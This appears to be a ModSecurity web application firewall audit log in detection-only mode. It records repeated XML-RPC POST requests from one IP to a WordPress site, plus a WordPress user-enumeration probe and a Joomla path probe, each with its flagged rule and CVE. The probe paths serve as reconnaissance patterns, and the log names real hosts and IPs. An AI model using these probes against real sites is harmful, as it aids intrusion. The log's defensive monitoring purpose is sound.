Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7yNTtuDRGAAnNiXIecXwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004277037261 1019623 (- - -) Stopwatch2: 1750004277037261 1019623; combined=2495, p1=430, p2=1648, p3=45, p4=68, p5=188, sr=121, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9a6c907c-Z-- --f9960a46-A-- [15/Jun/2025:21:48:58.117596 +0530] aE7ycd40YvvHR2Fi0mNEjAAAAAk 128.199.112.101 57170 127.0.0.1 7081 --f9960a46-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f9960a46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f9960a46-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7ycd40YvvHR2Fi0mNEjAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004337210011 907640 (- - -) Stopwatch2: 1750004337210011 907640; combined=2555, p1=474, p2=1727, p3=44, p4=55, p5=159, sr=133, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9960a46-Z-- --fb24af34-A-- [15/Jun/2025:21:49:58.448614 +0530] aE7yrc4euW2k9bZXhFmjfgAAAAo 128.199.112.101 52794 127.0.0.1 7081 --fb24af34-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --fb24af34-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fb24af34-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7yrc4euW2k9bZXhFmjfgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004397483550 965121 (- - -) Stopwatch2: 1750004397483550 965121; combined=2469, p1=463, p2=1588, p3=42, p4=65, p5=208, sr=160, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb24af34-Z-- --8812ed08-A-- [15/Jun/2025:21:50:16.939325 +0530] aE7yv7ELSBhs7IymaYRMOQAAAAM 178.128.55.15 40634 127.0.0.1 7081 --8812ed08-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.retaxis.com X-Real-IP: 178.128.55.15 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=f009fecdf5c99dd146dc6ff3f4a0b3601750004413 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --8812ed08-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.retaxis.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --8812ed08-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.retaxis.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7yv7ELSBhs7IymaYRMOQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004415795233 1144162 (- - -) Stopwatch2: 1750004415795233 1144162; combined=2622, p1=409, p2=2101, p3=0, p4=0, p5=112, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8812ed08-Z-- --a85c155c-A-- [15/Jun/2025:21:50:52.019199 +0530] aE7y4kmAj8yxyFrMChhr2gAAAAE 52.169.160.88 33268 127.0.0.1 7081 --a85c155c-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 52.169.160.88 X-Accel-Internal: /internal-nginx-static-location Connection: close --a85c155c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --a85c155c-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.tandonamit.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE7y4kmAj8yxyFrMChhr2gAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004450375593 1643663 (- - -) Stopwatch2: 1750004450375593 1643663; combined=1864, p1=330, p2=1442, p3=0, p4=0, p5=92, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a85c155c-Z-- --95d0183d-A-- [15/Jun/2025:21:50:58.675222 +0530] aE7y6c4euW2k9bZXhFmjngAAAAo 128.199.112.101 33624 127.0.0.1 7081 --95d0183d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --95d0183d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --95d0183d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7y6c4euW2k9bZXhFmjngAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004457727217 948061 (- - -) Stopwatch2: 1750004457727217 948061; combined=2393, p1=381, p2=1584, p3=45, p4=79, p5=189, sr=111, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --95d0183d-Z-- --82586837-A-- [15/Jun/2025:21:51:58.635087 +0530] aE7zJeVVOp7UpcMHtmz7EwAAAAc 128.199.112.101 53152 127.0.0.1 7081 --82586837-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --82586837-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --82586837-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7zJeVVOp7UpcMHtmz7EwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004517639942 995213 (- - -) Stopwatch2: 1750004517639942 995213; combined=2251, p1=384, p2=1366, p3=45, p4=124, p5=215, sr=104, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82586837-Z-- --0c29dd58-A-- [15/Jun/2025:21:52:58.420317 +0530] aE7zYc4euW2k9bZXhFmj3AAAAAo 128.199.112.101 54360 127.0.0.1 7081 --0c29dd58-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --0c29dd58-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0c29dd58-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7zYc4euW2k9bZXhFmj3AAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004577455391 964984 (- - -) Stopwatch2: 1750004577455391 964984; combined=2360, p1=397, p2=1533, p3=45, p4=73, p5=191, sr=109, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c29dd58-Z-- --276c9804-A-- [15/Jun/2025:21:53:58.469932 +0530] aE7znbELSBhs7IymaYRMswAAAAM 128.199.112.101 46664 127.0.0.1 7081 --276c9804-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --276c9804-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --276c9804-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7znbELSBhs7IymaYRMswAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004637522383 947605 (- - -) Stopwatch2: 1750004637522383 947605; combined=2201, p1=373, p2=1352, p3=48, p4=81, p5=208, sr=108, sw=139, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --276c9804-Z-- --8d812a29-A-- [15/Jun/2025:21:54:58.125229 +0530] aE7z2bELSBhs7IymaYRM0gAAAAM 128.199.112.101 56218 127.0.0.1 7081 --8d812a29-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --8d812a29-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8d812a29-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7z2bELSBhs7IymaYRM0gAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004697206813 918472 (- - -) Stopwatch2: 1750004697206813 918472; combined=2411, p1=363, p2=1606, p3=55, p4=79, p5=191, sr=101, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d812a29-Z-- --2de7341b-A-- [15/Jun/2025:21:55:57.956286 +0530] aE70Fc4euW2k9bZXhFmkNAAAAAo 128.199.112.101 46858 127.0.0.1 7081 --2de7341b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2de7341b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2de7341b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE70Fc4euW2k9bZXhFmkNAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004757027616 928738 (- - -) Stopwatch2: 1750004757027616 928738; combined=2213, p1=364, p2=1363, p3=51, p4=76, p5=225, sr=101, sw=134, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2de7341b-Z-- --70f91c46-A-- [15/Jun/2025:21:56:58.362796 +0530] aE70UbELSBhs7IymaYRNCAAAAAM 128.199.112.101 53592 127.0.0.1 7081 --70f91c46-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --70f91c46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --70f91c46-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE70UbELSBhs7IymaYRNCAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004817425182 937669 (- - -) Stopwatch2: 1750004817425182 937669; combined=2127, p1=385, p2=1334, p3=48, p4=67, p5=179, sr=114, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --70f91c46-Z-- --a707166c-A-- [15/Jun/2025:21:57:59.183471 +0530] aE70jrELSBhs7IymaYRNJAAAAAM 128.199.112.101 49470 127.0.0.1 7081 --a707166c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a707166c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a707166c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE70jrELSBhs7IymaYRNJAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004878147808 1035729 (- - -) Stopwatch2: 1750004878147808 1035729; combined=2347, p1=476, p2=1488, p3=43, p4=68, p5=171, sr=131, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a707166c-Z-- --6f50a20a-A-- [15/Jun/2025:21:58:58.955716 +0530] aE70yrELSBhs7IymaYRNRwAAAAM 128.199.112.101 33452 127.0.0.1 7081 --6f50a20a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6f50a20a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6f50a20a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE70yrELSBhs7IymaYRNRwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004938023691 932082 (- - -) Stopwatch2: 1750004938023691 932082; combined=2163, p1=400, p2=1314, p3=48, p4=69, p5=210, sr=131, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f50a20a-Z-- --450cc601-A-- [15/Jun/2025:21:59:59.562159 +0530] aE71BkmAj8yxyFrMChhs7wAAAAE 128.199.112.101 49474 127.0.0.1 7081 --450cc601-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --450cc601-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --450cc601-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] 